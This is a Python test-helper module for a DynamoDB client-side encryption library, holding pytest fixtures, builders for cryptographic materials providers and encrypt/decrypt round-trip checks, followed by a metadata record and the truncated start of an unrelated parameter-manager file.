\"value\": Decimal(\"92986745\")},\n },\n {\n \"partition_attribute\": {\"type\": \"S\", \"value\": \"test_value\"},\n \"sort_attribute\": {\"type\": \"N\", \"value\": Decimal(\"2231.0001\")},\n },\n {\n \"partition_attribute\": {\"type\": \"S\", \"value\": \"another_test_value\"},\n \"sort_attribute\": {\"type\": \"N\", \"value\": Decimal(\"732342\")},\n },\n]\nTEST_BATCH_KEYS = [{name: value[\"value\"] for name, value in key.items()} for key in TEST_BATCH_INDEXES]\n\n\n@pytest.fixture(scope=\"module\")\ndef mock_ddb_service():\n \"\"\"Centralize service mock to avoid resetting service for tests that use multiple tables.\"\"\"\n with mock_dynamodb2():\n yield boto3.client(\"dynamodb\", region_name=TEST_REGION_NAME)\n\n\n@pytest.fixture\ndef example_table(mock_ddb_service):\n mock_ddb_service.create_table(\n TableName=TEST_TABLE_NAME,\n KeySchema=[\n {\"AttributeName\": \"partition_attribute\", \"KeyType\": \"HASH\"},\n {\"AttributeName\": \"sort_attribute\", \"KeyType\": \"RANGE\"},\n ],\n AttributeDefinitions=[\n {\"AttributeName\": name, \"AttributeType\": value[\"type\"]} for name, value in TEST_INDEX.items()\n ],\n ProvisionedThroughput={\"ReadCapacityUnits\": 100, \"WriteCapacityUnits\": 100},\n )\n yield mock_ddb_service\n mock_ddb_service.delete_table(TableName=TEST_TABLE_NAME)\n\n\n@pytest.fixture\ndef table_with_local_secondary_indexes(mock_ddb_service):\n mock_ddb_service.create_table(\n TableName=TEST_TABLE_NAME,\n KeySchema=[\n {\"AttributeName\": \"partition_attribute\", \"KeyType\": \"HASH\"},\n {\"AttributeName\": \"sort_attribute\", \"KeyType\": \"RANGE\"},\n ],\n LocalSecondaryIndexes=[\n {\n \"IndexName\": \"lsi-1\",\n \"KeySchema\": [{\"AttributeName\": \"secondary_index_1\", \"KeyType\": \"HASH\"}],\n \"Projection\": {\"ProjectionType\": \"ALL\"},\n },\n {\n \"IndexName\": \"lsi-2\",\n \"KeySchema\": [{\"AttributeName\": \"secondary_index_2\", \"KeyType\": \"HASH\"}],\n \"Projection\": {\"ProjectionType\": \"ALL\"},\n },\n ],\n AttributeDefinitions=[\n {\"AttributeName\": name, \"AttributeType\": value[\"type\"]}\n for name, value in 
list(TEST_INDEX.items()) + list(SECONDARY_INDEX.items())\n ],\n ProvisionedThroughput={\"ReadCapacityUnits\": 100, \"WriteCapacityUnits\": 100},\n )\n yield mock_ddb_service\n mock_ddb_service.delete_table(TableName=TEST_TABLE_NAME)\n\n\n@pytest.fixture\ndef table_with_global_secondary_indexes(mock_ddb_service):\n mock_ddb_service.create_table(\n TableName=TEST_TABLE_NAME,\n KeySchema=[\n {\"AttributeName\": \"partition_attribute\", \"KeyType\": \"HASH\"},\n {\"AttributeName\": \"sort_attribute\", \"KeyType\": \"RANGE\"},\n ],\n GlobalSecondaryIndexes=[\n {\n \"IndexName\": \"gsi-1\",\n \"KeySchema\": [{\"AttributeName\": \"secondary_index_1\", \"KeyType\": \"HASH\"}],\n \"Projection\": {\"ProjectionType\": \"ALL\"},\n \"ProvisionedThroughput\": {\"ReadCapacityUnits\": 100, \"WriteCapacityUnits\": 100},\n },\n {\n \"IndexName\": \"gsi-2\",\n \"KeySchema\": [{\"AttributeName\": \"secondary_index_2\", \"KeyType\": \"HASH\"}],\n \"Projection\": {\"ProjectionType\": \"ALL\"},\n \"ProvisionedThroughput\": {\"ReadCapacityUnits\": 100, \"WriteCapacityUnits\": 100},\n },\n ],\n AttributeDefinitions=[\n {\"AttributeName\": name, \"AttributeType\": value[\"type\"]}\n for name, value in list(TEST_INDEX.items()) + list(SECONDARY_INDEX.items())\n ],\n ProvisionedThroughput={\"ReadCapacityUnits\": 100, \"WriteCapacityUnits\": 100},\n )\n yield mock_ddb_service\n mock_ddb_service.delete_table(TableName=TEST_TABLE_NAME)\n\n\nclass PassThroughCryptographicMaterialsProviderThatRequiresAttributes(CryptographicMaterialsProvider):\n \"\"\"Cryptographic materials provider that passes through to another, but requires that attributes are set.\n\n If the EncryptionContext passed to decryption_materials or encryption_materials\n ever does not have attributes set,\n a ValueError is raised.\n Otherwise, it passes through to the passthrough CMP normally.\n \"\"\"\n\n def __init__(self, passthrough_cmp):\n self._passthrough_cmp = passthrough_cmp\n\n @staticmethod\n def _assert_attributes_set(encryption_context):\n # type: (EncryptionContext) -> None\n if not encryption_context.attributes:\n raise ValueError(\"Encryption context attributes MUST be set!\")\n\n def decryption_materials(self, encryption_context):\n # type: (EncryptionContext) -> CryptographicMaterials\n self._assert_attributes_set(encryption_context)\n return self._passthrough_cmp.decryption_materials(encryption_context)\n\n def encryption_materials(self, encryption_context):\n # type: (EncryptionContext) -> CryptographicMaterials\n self._assert_attributes_set(encryption_context)\n return self._passthrough_cmp.encryption_materials(encryption_context)\n\n def refresh(self):\n # type: () -> None\n self._passthrough_cmp.refresh()\n\n\ndef _get_from_cache(dk_class, algorithm, key_length):\n \"\"\"Don't generate new keys every time. 
All we care about is that they are valid keys, not that they are unique.\"\"\"\n try:\n return _DELEGATED_KEY_CACHE[dk_class][algorithm][key_length]\n except KeyError:\n key = dk_class.generate(algorithm, key_length)\n _DELEGATED_KEY_CACHE[dk_class][algorithm][key_length] = key\n return key\n\n\ndef build_static_jce_cmp(encryption_algorithm, encryption_key_length, signing_algorithm, signing_key_length):\n \"\"\"Build a StaticCryptographicMaterialsProvider using ephemeral JceNameLocalDelegatedKeys as specified.\"\"\"\n encryption_key = _get_from_cache(JceNameLocalDelegatedKey, encryption_algorithm, encryption_key_length)\n authentication_key = _get_from_cache(JceNameLocalDelegatedKey, signing_algorithm, signing_key_length)\n encryption_materials = RawEncryptionMaterials(signing_key=authentication_key, encryption_key=encryption_key)\n decryption_materials = RawDecryptionMaterials(verification_key=authentication_key, decryption_key=encryption_key)\n return StaticCryptographicMaterialsProvider(\n encryption_materials=encryption_materials, decryption_materials=decryption_materials\n )\n\n\ndef _build_wrapped_jce_cmp(wrapping_algorithm, wrapping_key_length, signing_algorithm, signing_key_length):\n \"\"\"Build a WrappedCryptographicMaterialsProvider using ephemeral JceNameLocalDelegatedKeys as specified.\"\"\"\n wrapping_key = _get_from_cache(JceNameLocalDelegatedKey, wrapping_algorithm, wrapping_key_length)\n signing_key = _get_from_cache(JceNameLocalDelegatedKey, signing_algorithm, signing_key_length)\n return WrappedCryptographicMaterialsProvider(\n wrapping_key=wrapping_key, unwrapping_key=wrapping_key, signing_key=signing_key\n )\n\n\ndef _all_encryption():\n \"\"\"All encryption configurations to test in slow tests.\"\"\"\n return itertools.chain(itertools.product((\"AES\",), (128, 256)), itertools.product((\"RSA\",), (1024, 2048, 4096)))\n\n\ndef _all_authentication():\n \"\"\"All authentication configurations to test in slow tests.\"\"\"\n return itertools.chain(\n itertools.product((\"HmacSHA224\", \"HmacSHA256\", \"HmacSHA384\", \"HmacSHA512\"), (128, 256)),\n itertools.product((\"SHA224withRSA\", \"SHA256withRSA\", \"SHA384withRSA\", \"SHA512withRSA\"), (1024, 2048, 4096)),\n )\n\n\ndef _all_algorithm_pairs():\n \"\"\"All algorithm pairs (encryption + authentication) to test in slow tests.\"\"\"\n for encryption_pair, signing_pair in itertools.product(_all_encryption(), _all_authentication()):\n yield encryption_pair + signing_pair\n\n\ndef _some_algorithm_pairs():\n \"\"\"Cherry-picked set of algorithm pairs (encryption + authentication) to test in fast tests.\"\"\"\n return ((\"AES\", 256, \"HmacSHA256\", 256), (\"AES\", 256, \"SHA256withRSA\", 4096), (\"RSA\", 4096, \"SHA256withRSA\", 4096))\n\n\n_cmp_builders = {\"static\": build_static_jce_cmp, \"wrapped\": _build_wrapped_jce_cmp}\n\n\ndef _all_possible_cmps(algorithm_generator, require_attributes):\n \"\"\"Generate all possible cryptographic materials providers based on the supplied generator.\n\n require_attributes determines whether the CMP will be wrapped in\n PassThroughCryptographicMaterialsProviderThatRequiresAttributes\n to require that attributes are set on every request.\n This should ONLY be disabled on the item encryptor tests.\n All high-level helper clients MUST set the attributes before passing the encryption context down.\n \"\"\"\n # The AES combinations do the same thing, but this makes sure that the AESWrap name works as expected.\n yield _build_wrapped_jce_cmp(\"AESWrap\", 256, \"HmacSHA256\", 256)\n\n for 
builder_info, args in itertools.product(_cmp_builders.items(), algorithm_generator()):\n builder_type, builder_func = builder_info\n encryption_algorithm, encryption_key_length, signing_algorithm, signing_key_length = args\n\n if builder_type == \"static\" and encryption_algorithm != \"AES\":\n # Only AES keys are allowed to be used with static materials\n continue\n\n id_string = \"{enc_algorithm}/{enc_key_length} {builder_type} {sig_algorithm}/{sig_key_length}\".format(\n enc_algorithm=encryption_algorithm,\n enc_key_length=encryption_key_length,\n builder_type=builder_type,\n sig_algorithm=signing_algorithm,\n sig_key_length=signing_key_length,\n )\n\n inner_cmp = builder_func(encryption_algorithm, encryption_key_length, signing_algorithm, signing_key_length)\n\n if require_attributes:\n outer_cmp = PassThroughCryptographicMaterialsProviderThatRequiresAttributes(inner_cmp)\n else:\n outer_cmp = inner_cmp\n\n yield pytest.param(outer_cmp, id=id_string)\n\n\ndef set_parametrized_cmp(metafunc, require_attributes=True):\n \"\"\"Set paramatrized values for cryptographic materials providers.\n\n require_attributes determines whether the CMP will be wrapped in\n PassThroughCryptographicMaterialsProviderThatRequiresAttributes\n to require that attributes are set on every request.\n This should ONLY be disabled on the item encryptor tests.\n All high-level helper clients MUST set the attributes before passing the encryption context down.\n \"\"\"\n for name, algorithm_generator in ((\"all_the_cmps\", _all_algorithm_pairs), (\"some_cmps\", _some_algorithm_pairs)):\n if name in metafunc.fixturenames:\n metafunc.parametrize(name, _all_possible_cmps(algorithm_generator, require_attributes))\n\n\n_ACTIONS = {\n \"hypothesis_actions\": (\n pytest.param(AttributeActions(default_action=CryptoAction.ENCRYPT_AND_SIGN), id=\"encrypt all\"),\n pytest.param(AttributeActions(default_action=CryptoAction.SIGN_ONLY), id=\"sign only all\"),\n pytest.param(AttributeActions(default_action=CryptoAction.DO_NOTHING), id=\"do nothing\"),\n )\n}\n_ACTIONS[\"parametrized_actions\"] = _ACTIONS[\"hypothesis_actions\"] + (\n pytest.param(\n AttributeActions(\n default_action=CryptoAction.ENCRYPT_AND_SIGN,\n attribute_actions={\n \"number_set\": CryptoAction.SIGN_ONLY,\n \"string_set\": CryptoAction.SIGN_ONLY,\n \"binary_set\": CryptoAction.SIGN_ONLY,\n },\n ),\n id=\"sign sets, encrypt everything else\",\n ),\n pytest.param(\n AttributeActions(\n default_action=CryptoAction.ENCRYPT_AND_SIGN,\n attribute_actions={\n \"number_set\": CryptoAction.DO_NOTHING,\n \"string_set\": CryptoAction.DO_NOTHING,\n \"binary_set\": CryptoAction.DO_NOTHING,\n },\n ),\n id=\"ignore sets, encrypt everything else\",\n ),\n pytest.param(\n AttributeActions(\n default_action=CryptoAction.DO_NOTHING, attribute_actions={\"map\": CryptoAction.ENCRYPT_AND_SIGN}\n ),\n id=\"encrypt map, ignore everything else\",\n ),\n pytest.param(\n AttributeActions(\n default_action=CryptoAction.SIGN_ONLY,\n attribute_actions={\n \"number_set\": CryptoAction.DO_NOTHING,\n \"string_set\": CryptoAction.DO_NOTHING,\n \"binary_set\": CryptoAction.DO_NOTHING,\n \"map\": CryptoAction.ENCRYPT_AND_SIGN,\n },\n ),\n id=\"ignore sets, encrypt map, sign everything else\",\n ),\n)\n\n\ndef set_parametrized_actions(metafunc):\n \"\"\"Set parametrized values for attribute actions.\"\"\"\n for name, actions in _ACTIONS.items():\n if name in metafunc.fixturenames:\n metafunc.parametrize(name, actions)\n\n\ndef set_parametrized_item(metafunc):\n \"\"\"Set parametrized values for 
items to cycle.\"\"\"\n if \"parametrized_item\" in metafunc.fixturenames:\n metafunc.parametrize(\"parametrized_item\", (pytest.param(diverse_item(), id=\"diverse item\"),))\n\n\ndef diverse_item():\n base_item = {\n \"int\": 5,\n \"decimal\": Decimal(\"123.456\"),\n \"string\": \"this is a string\",\n \"binary\": b\"this is a bytestring! \\x01\",\n \"number_set\": set([5, 4, 3]),\n \"string_set\": set([\"abc\", \"def\", \"geh\"]),\n \"binary_set\": set([b\"\\x00\\x00\\x00\", b\"\\x00\\x01\\x00\", b\"\\x00\\x00\\x02\"]),\n }\n base_item[\"list\"] = [copy.copy(i) for i in base_item.values()]\n base_item[\"map\"] = copy.deepcopy(base_item)\n return copy.deepcopy(base_item)\n\n\n_reserved_attributes = {attr.value for attr in ReservedAttributes}\n\n\ndef return_requestitems_as_unprocessed(*args, **kwargs):\n return {\"UnprocessedItems\": kwargs[\"RequestItems\"]}\n\n\ndef check_encrypted_item(plaintext_item, ciphertext_item, attribute_actions):\n # Verify that all expected attributes are present\n ciphertext_attributes = set(ciphertext_item.keys())\n plaintext_attributes = set(plaintext_item.keys())\n if attribute_actions.take_no_actions:\n assert ciphertext_attributes == plaintext_attributes\n else:\n assert ciphertext_attributes == plaintext_attributes.union(_reserved_attributes)\n\n for name, value in ciphertext_item.items():\n # Skip the attributes we add\n if name in _reserved_attributes:\n continue\n\n # If the attribute should have been encrypted, verify that it is Binary and different from the original\n if attribute_actions.action(name) is CryptoAction.ENCRYPT_AND_SIGN:\n assert isinstance(value, Binary)\n assert value != plaintext_item[name]\n # Otherwise, verify that it is the same as the original\n else:\n assert value == plaintext_item[name]\n\n\ndef _matching_key(actual_item, expected):\n expected_item = [\n i\n for i in expected\n if i[\"partition_attribute\"] == actual_item[\"partition_attribute\"]\n and i[\"sort_attribute\"] == actual_item[\"sort_attribute\"]\n ]\n assert len(expected_item) == 1\n return expected_item[0]\n\n\ndef _nop_transformer(item):\n return item\n\n\ndef assert_items_exist_in_list(source, expected, transformer):\n for actual_item in source:\n expected_item = _matching_key(actual_item, expected)\n assert transformer(actual_item) == transformer(expected_item)\n\n\ndef assert_equal_lists_of_items(actual, expected, transformer=_nop_transformer):\n assert len(actual) == len(expected)\n assert_items_exist_in_list(actual, expected, transformer)\n\n\ndef assert_list_of_items_contains(full, subset, transformer=_nop_transformer):\n assert len(full) >= len(subset)\n assert_items_exist_in_list(subset, full, transformer)\n\n\ndef check_many_encrypted_items(actual, expected, attribute_actions, transformer=_nop_transformer):\n assert len(actual) == len(expected)\n\n for actual_item in actual:\n expected_item = _matching_key(actual_item, expected)\n check_encrypted_item(\n plaintext_item=transformer(expected_item),\n ciphertext_item=transformer(actual_item),\n attribute_actions=attribute_actions,\n )\n\n\ndef _generate_items(initial_item, write_transformer):\n items = []\n for key in TEST_BATCH_KEYS:\n _item = initial_item.copy()\n _item.update(key)\n items.append(write_transformer(_item))\n return items\n\n\ndef _cleanup_items(encrypted, write_transformer, table_name=TEST_TABLE_NAME):\n ddb_keys = [write_transformer(key) for key in TEST_BATCH_KEYS]\n _delete_result = encrypted.batch_write_item( # noqa\n RequestItems={table_name: [{\"DeleteRequest\": {\"Key\": _key}} 
for _key in ddb_keys]}\n )\n\n\ndef cycle_batch_item_check(\n raw,\n encrypted,\n initial_actions,\n initial_item,\n write_transformer=_nop_transformer,\n read_transformer=_nop_transformer,\n table_name=TEST_TABLE_NAME,\n delete_items=True,\n):\n \"\"\"Check that cycling (plaintext->encrypted->decrypted) item batch has the expected results.\"\"\"\n check_attribute_actions = initial_actions.copy()\n check_attribute_actions.set_index_keys(*list(TEST_KEY.keys()))\n items = _generate_items(initial_item, write_transformer)\n items_in_table = len(items)\n\n _put_result = encrypted.batch_write_item( # noqa\n RequestItems={table_name: [{\"PutRequest\": {\"Item\": _item}} for _item in items]}\n )\n\n try:\n ddb_keys = [write_transformer(key) for key in TEST_BATCH_KEYS]\n encrypted_result = raw.batch_get_item(RequestItems={table_name: {\"Keys\": ddb_keys}})\n check_many_encrypted_items(\n actual=encrypted_result[\"Responses\"][table_name],\n expected=items,\n attribute_actions=check_attribute_actions,\n transformer=read_transformer,\n )\n\n decrypted_result = encrypted.batch_get_item(RequestItems={table_name: {\"Keys\": ddb_keys}})\n assert_equal_lists_of_items(\n actual=decrypted_result[\"Responses\"][table_name], expected=items, transformer=read_transformer\n )\n finally:\n if delete_items:\n _cleanup_items(encrypted, write_transformer, table_name)\n items_in_table = 0\n\n del check_attribute_actions\n del items\n return items_in_table\n\n\ndef cycle_batch_writer_check(raw_table, encrypted_table, initial_actions, initial_item):\n \"\"\"Cycling (plaintext->encrypted->decrypted) items with the Table batch writer should have the expected results.\"\"\"\n check_attribute_actions = initial_actions.copy()\n check_attribute_actions.set_index_keys(*list(TEST_KEY.keys()))\n items = _generate_items(initial_item, _nop_transformer)\n\n with encrypted_table.batch_writer() as writer:\n for item in items:\n writer.put_item(item)\n\n ddb_keys = copy.copy(TEST_BATCH_KEYS)\n encrypted_items = [raw_table.get_item(Key=key, ConsistentRead=True)[\"Item\"] for key in ddb_keys]\n check_many_encrypted_items(\n actual=encrypted_items, expected=items, attribute_actions=check_attribute_actions, transformer=_nop_transformer\n )\n\n decrypted_result = [encrypted_table.get_item(Key=key, ConsistentRead=True)[\"Item\"] for key in ddb_keys]\n assert_equal_lists_of_items(actual=decrypted_result, expected=items, transformer=_nop_transformer)\n\n with encrypted_table.batch_writer() as writer:\n for key in ddb_keys:\n writer.delete_item(key)\n\n del check_attribute_actions\n del items\n\n\ndef batch_write_item_unprocessed_check(\n encrypted, initial_item, write_transformer=_nop_transformer, table_name=TEST_TABLE_NAME\n):\n \"\"\"Check that unprocessed items in a batch result are unencrypted.\"\"\"\n items = _generate_items(initial_item, write_transformer)\n\n request_items = {table_name: [{\"PutRequest\": {\"Item\": _item}} for _item in items]}\n _put_result = encrypted.batch_write_item(RequestItems=request_items)\n\n # we expect results to include Unprocessed items, or the test case is invalid!\n unprocessed_items = _put_result[\"UnprocessedItems\"]\n assert unprocessed_items != {}\n\n unprocessed = [operation[\"PutRequest\"][\"Item\"] for operation in unprocessed_items[TEST_TABLE_NAME]]\n assert_list_of_items_contains(items, unprocessed, transformer=_nop_transformer)\n\n del items\n\n\ndef cycle_item_check(plaintext_item, crypto_config):\n \"\"\"Check that cycling (plaintext->encrypted->decrypted) an item has the expected 
results.\"\"\"\n ciphertext_item = encrypt_python_item(plaintext_item, crypto_config)\n\n check_encrypted_item(plaintext_item, ciphertext_item, crypto_config.attribute_actions)\n\n cycled_item = decrypt_python_item(ciphertext_item, crypto_config)\n\n assert cycled_item == plaintext_item\n del ciphertext_item\n del cycled_item\n\n\ndef table_cycle_check(materials_provider, initial_actions, initial_item, table_name, region_name=None):\n check_attribute_actions = initial_actions.copy()\n check_attribute_actions.set_index_keys(*list(TEST_KEY.keys()))\n item = initial_item.copy()\n item.update(TEST_KEY)\n\n kwargs = {}\n if region_name is not None:\n kwargs[\"region_name\"] = region_name\n table = boto3.resource(\"dynamodb\", **kwargs).Table(table_name)\n e_table = EncryptedTable(table=table, materials_provider=materials_provider, attribute_actions=initial_actions)\n\n _put_result = e_table.put_item(Item=item) # noqa\n\n encrypted_result = table.get_item(Key=TEST_KEY, ConsistentRead=True)\n check_encrypted_item(item, encrypted_result[\"Item\"], check_attribute_actions)\n\n decrypted_result = e_table.get_item(Key=TEST_KEY, ConsistentRead=True)\n assert decrypted_result[\"Item\"] == item\n\n e_table.delete_item(Key=TEST_KEY)\n del item\n del check_attribute_actions\n\n\ndef table_cycle_batch_writer_check(materials_provider, initial_actions, initial_item, table_name, region_name=None):\n kwargs = {}\n if region_name is not None:\n kwargs[\"region_name\"] = region_name\n table = boto3.resource(\"dynamodb\", **kwargs).Table(table_name)\n e_table = EncryptedTable(table=table, materials_provider=materials_provider, attribute_actions=initial_actions)\n\n cycle_batch_writer_check(table, e_table, initial_actions, initial_item)\n\n\ndef table_batch_writer_unprocessed_items_check(\n materials_provider, initial_actions, initial_item, table_name, region_name=None\n):\n kwargs = {}\n if region_name is not None:\n kwargs[\"region_name\"] = region_name\n resource = boto3.resource(\"dynamodb\", **kwargs)\n table = resource.Table(table_name)\n\n items = _generate_items(initial_item, _nop_transformer)\n request_items = {table_name: [{\"PutRequest\": {\"Item\": _item}} for _item in items]}\n\n with patch.object(table.meta.client, \"batch_write_item\") as batch_write_mock:\n # Check that unprocessed items returned to a BatchWriter are successfully retried\n batch_write_mock.side_effect = [{\"UnprocessedItems\": request_items}, {\"UnprocessedItems\": {}}]\n e_table = EncryptedTable(table=table, materials_provider=materials_provider, attribute_actions=initial_actions)\n\n with e_table.batch_writer() as writer:\n for item in items:\n writer.put_item(item)\n\n del items\n\n\ndef resource_cycle_batch_items_check(materials_provider, initial_actions, initial_item, table_name, region_name=None):\n kwargs = {}\n if region_name is not None:\n kwargs[\"region_name\"] = region_name\n resource = boto3.resource(\"dynamodb\", **kwargs)\n e_resource = EncryptedResource(\n resource=resource, materials_provider=materials_provider, attribute_actions=initial_actions\n )\n\n cycle_batch_item_check(\n raw=resource,\n encrypted=e_resource,\n initial_actions=initial_actions,\n initial_item=initial_item,\n table_name=table_name,\n )\n\n raw_scan_result = resource.Table(table_name).scan(ConsistentRead=True)\n e_scan_result = e_resource.Table(table_name).scan(ConsistentRead=True)\n assert not raw_scan_result[\"Items\"]\n assert not e_scan_result[\"Items\"]\n\n\ndef resource_batch_items_unprocessed_check(\n materials_provider, initial_actions, 
initial_item, table_name, region_name=None\n):\n kwargs = {}\n if region_name is not None:\n kwargs[\"region_name\"] = region_name\n resource = boto3.resource(\"dynamodb\", **kwargs)\n\n with patch.object(resource, \"batch_write_item\", return_requestitems_as_unprocessed):\n e_resource = EncryptedResource(\n resource=resource, materials_provider=materials_provider, attribute_actions=initial_actions\n )\n\n batch_write_item_unprocessed_check(\n encrypted=e_resource, initial_item=initial_item, write_transformer=dict_to_ddb, table_name=table_name\n )\n\n\ndef client_cycle_single_item_check(materials_provider, initial_actions, initial_item, table_name, region_name=None):\n check_attribute_actions = initial_actions.copy()\n check_attribute_actions.set_index_keys(*list(TEST_KEY.keys()))\n item = initial_item.copy()\n item.update(TEST_KEY)\n ddb_item = dict_to_ddb(item)\n ddb_key = dict_to_ddb(TEST_KEY)\n\n kwargs = {}\n if region_name is not None:\n kwargs[\"region_name\"] = region_name\n client = boto3.client(\"dynamodb\", **kwargs)\n e_client = EncryptedClient(client=client, materials_provider=materials_provider, attribute_actions=initial_actions)\n\n _put_result = e_client.put_item(TableName=table_name, Item=ddb_item) # noqa\n\n encrypted_result = client.get_item(TableName=table_name, Key=ddb_key, ConsistentRead=True)\n check_encrypted_item(item, ddb_to_dict(encrypted_result[\"Item\"]), check_attribute_actions)\n\n decrypted_result = e_client.get_item(TableName=table_name, Key=ddb_key, ConsistentRead=True)\n assert ddb_to_dict(decrypted_result[\"Item\"]) == item\n\n e_client.delete_item(TableName=table_name, Key=ddb_key)\n del item\n del check_attribute_actions\n\n\ndef client_cycle_batch_items_check(materials_provider, initial_actions, initial_item, table_name, region_name=None):\n kwargs = {}\n if region_name is not None:\n kwargs[\"region_name\"] = region_name\n client = boto3.client(\"dynamodb\", **kwargs)\n e_client = EncryptedClient(client=client, materials_provider=materials_provider, attribute_actions=initial_actions)\n\n cycle_batch_item_check(\n raw=client,\n encrypted=e_client,\n initial_actions=initial_actions,\n initial_item=initial_item,\n write_transformer=dict_to_ddb,\n read_transformer=ddb_to_dict,\n table_name=table_name,\n )\n\n raw_scan_result = client.scan(TableName=table_name, ConsistentRead=True)\n e_scan_result = e_client.scan(TableName=table_name, ConsistentRead=True)\n assert not raw_scan_result[\"Items\"]\n assert not e_scan_result[\"Items\"]\n\n\ndef client_batch_items_unprocessed_check(\n materials_provider, initial_actions, initial_item, table_name, region_name=None\n):\n kwargs = {}\n if region_name is not None:\n kwargs[\"region_name\"] = region_name\n client = boto3.client(\"dynamodb\", **kwargs)\n\n with patch.object(client, \"batch_write_item\", return_requestitems_as_unprocessed):\n e_client = EncryptedClient(\n client=client, materials_provider=materials_provider, attribute_actions=initial_actions\n )\n\n batch_write_item_unprocessed_check(\n encrypted=e_client, initial_item=initial_item, write_transformer=dict_to_ddb, table_name=table_name\n )\n\n\ndef client_cycle_batch_items_check_scan_paginator(\n materials_provider, initial_actions, initial_item, table_name, region_name=None\n):\n \"\"\"Helper function for testing the \"scan\" paginator.\n\n Populate the specified table with encrypted items,\n scan the table with raw client paginator to get encrypted items,\n scan the table with encrypted client paginator to get decrypted items,\n then verify that all 
items appear to have been encrypted correctly.\n \"\"\" # noqa=D401\n # pylint: disable=too-many-locals\n kwargs = {}\n if region_name is not None:\n kwargs[\"region_name\"] = region_name\n client = boto3.client(\"dynamodb\", **kwargs)\n e_client = EncryptedClient(client=client, materials_provider=materials_provider, attribute_actions=initial_actions)\n\n items_in_table = cycle_batch_item_check(\n raw=client,\n encrypted=e_client,\n initial_actions=initial_actions,\n initial_item=initial_item,\n write_transformer=dict_to_ddb,\n read_transformer=ddb_to_dict,\n table_name=table_name,\n delete_items=False,\n )\n\n try:\n encrypted_items = []\n raw_paginator = client.get_paginator(\"scan\")\n for page in raw_paginator.paginate(TableName=table_name, ConsistentRead=True):\n encrypted_items.extend(page[\"Items\"])\n\n decrypted_items = []\n encrypted_paginator = e_client.get_paginator(\"scan\")\n for page in encrypted_paginator.paginate(TableName=table_name, ConsistentRead=True):\n decrypted_items.extend(page[\"Items\"])\n\n assert encrypted_items and decrypted_items\n assert len(encrypted_items) == len(decrypted_items) == items_in_table\n\n check_attribute_actions = initial_actions.copy()\n check_attribute_actions.set_index_keys(*list(TEST_KEY.keys()))\n check_many_encrypted_items(\n actual=encrypted_items,\n expected=decrypted_items,\n attribute_actions=check_attribute_actions,\n transformer=ddb_to_dict,\n )\n\n finally:\n _cleanup_items(encrypted=e_client, write_transformer=dict_to_ddb, table_name=table_name)\n\n raw_scan_result = client.scan(TableName=table_name, ConsistentRead=True)\n e_scan_result = e_client.scan(TableName=table_name, ConsistentRead=True)\n assert not raw_scan_result[\"Items\"]\n assert not e_scan_result[\"Items\"]\n\n\ndef build_metastore():\n client = boto3.client(\"dynamodb\", region_name=TEST_REGION_NAME)\n table_name = base64.urlsafe_b64encode(os.urandom(32)).decode(\"utf-8\").replace(\"=\", \".\")\n\n MetaStore.create_table(client, table_name, 1, 1)\n waiter = client.get_waiter(\"table_exists\")\n waiter.wait(TableName=table_name)\n\n table = boto3.resource(\"dynamodb\", region_name=TEST_REGION_NAME).Table(table_name)\n return MetaStore(table, build_static_jce_cmp(\"AES\", 256, \"HmacSHA256\", 256)), table_name\n\n\ndef delete_metastore(table_name):\n client = boto3.client(\"dynamodb\", region_name=TEST_REGION_NAME)\n client.delete_table(TableName=table_name)\n # It sometimes takes a long time to delete a table.\n # If hanging, asynchronously deleting tables becomes an issue,\n # come back to this.\n # Otherwise, let's just let them take care of themselves.\n # waiter = client.get_waiter(\"table_not_exists\")\n # waiter.wait(TableName=table_name)\n\n\n@pytest.fixture\ndef mock_metastore():\n with mock_dynamodb2():\n metastore, table_name = build_metastore()\n yield metastore\n delete_metastore(table_name)\n\n\ndef _count_entries(records, *messages):\n count = 0\n\n for record in records:\n if all((message in record.getMessage() for message in messages)):\n count += 1\n\n return count\n\n\ndef _count_puts(records, table_name):\n return _count_entries(records, '\"TableName\": \"{}\"'.format(table_name), \"OperationModel(name=PutItem)\")\n\n\ndef _count_gets(records, table_name):\n return _count_entries(records, '\"TableName\": \"{}\"'.format(table_name), \"OperationModel(name=GetItem)\")\n\n\ndef check_metastore_cache_use_encrypt(metastore, table_name, log_capture):\n try:\n table = boto3.resource(\"dynamodb\").Table(table_name)\n except NoRegionError:\n table = 
boto3.resource(\"dynamodb\", region_name=TEST_REGION_NAME).Table(table_name)\n\n most_recent_provider = CachingMostRecentProvider(provider_store=metastore, material_name=\"test\", version_ttl=600.0)\n e_table = EncryptedTable(table=table, materials_provider=most_recent_provider)\n\n item = diverse_item()\n item.update(TEST_KEY)\n e_table.put_item(Item=item)\n e_table.put_item(Item=item)\n e_table.put_item(Item=item)\n e_table.put_item(Item=item)\n\n try:\n primary_puts = _count_puts(log_capture.records, e_table.name)\n metastore_puts = _count_puts(log_capture.records, metastore._table.name)\n\n assert primary_puts == 4\n assert metastore_puts == 1\n\n e_table.get_item(Key=TEST_KEY)\n e_table.get_item(Key=TEST_KEY)\n e_table.get_item(Key=TEST_KEY)\n\n primary_gets = _count_gets(log_capture.records, e_table.name)\n metastore_gets = _count_gets(log_capture.records, metastore._table.name)\n metastore_puts = _count_puts(log_capture.records, metastore._table.name)\n\n assert primary_gets == 3\n assert metastore_gets == 0\n assert metastore_puts == 1\n\n most_recent_provider.refresh()\n\n e_table.get_item(Key=TEST_KEY)\n e_table.get_item(Key=TEST_KEY)\n e_table.get_item(Key=TEST_KEY)\n\n primary_gets = _count_gets(log_capture.records, e_table.name)\n metastore_gets = _count_gets(log_capture.records, metastore._table.name)\n\n assert primary_gets == 6\n assert metastore_gets == 1\n\n finally:\n e_table.delete_item(Key=TEST_KEY)\n","repo_name":"aws/aws-dynamodb-encryption-python","sub_path":"test/functional/functional_test_utils.py","file_name":"functional_test_utils.py","file_ext":"py","file_size_in_byte":35601,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"72"} +{"seq_id":"73966067434","text":"from typing import List, Tuple, Union\nfrom copy import deepcopy\n\nimport pandas as pd\n\nfrom pydock3.config import flatten_param_dict\nfrom pydock3.util import get_nested_dict_item, set_nested_dict_item\n\n\nclass ParametersManager(object):\n def __init__(self, parameters_dict):\n self._parameters_dict = parameters_dict\n\n @property\n def parameters_dict(self):\n return self._parameters_dict\n\n @property\n def flattened_parameters_dict(self):\n return flatten_param_dict(self._parameters_dict)\n\n\nclass DockoptComponentParametersManager(ParametersManager):\n def __init__(self, parameters_dict, last_component_completed=None):\n #\n if last_component_completed is not None:\n for row_index, row in last_component_completed.load_results_dataframe().head(last_component_completed.top_n).iterrows():\n nested_target_keys_and_value_tuples = 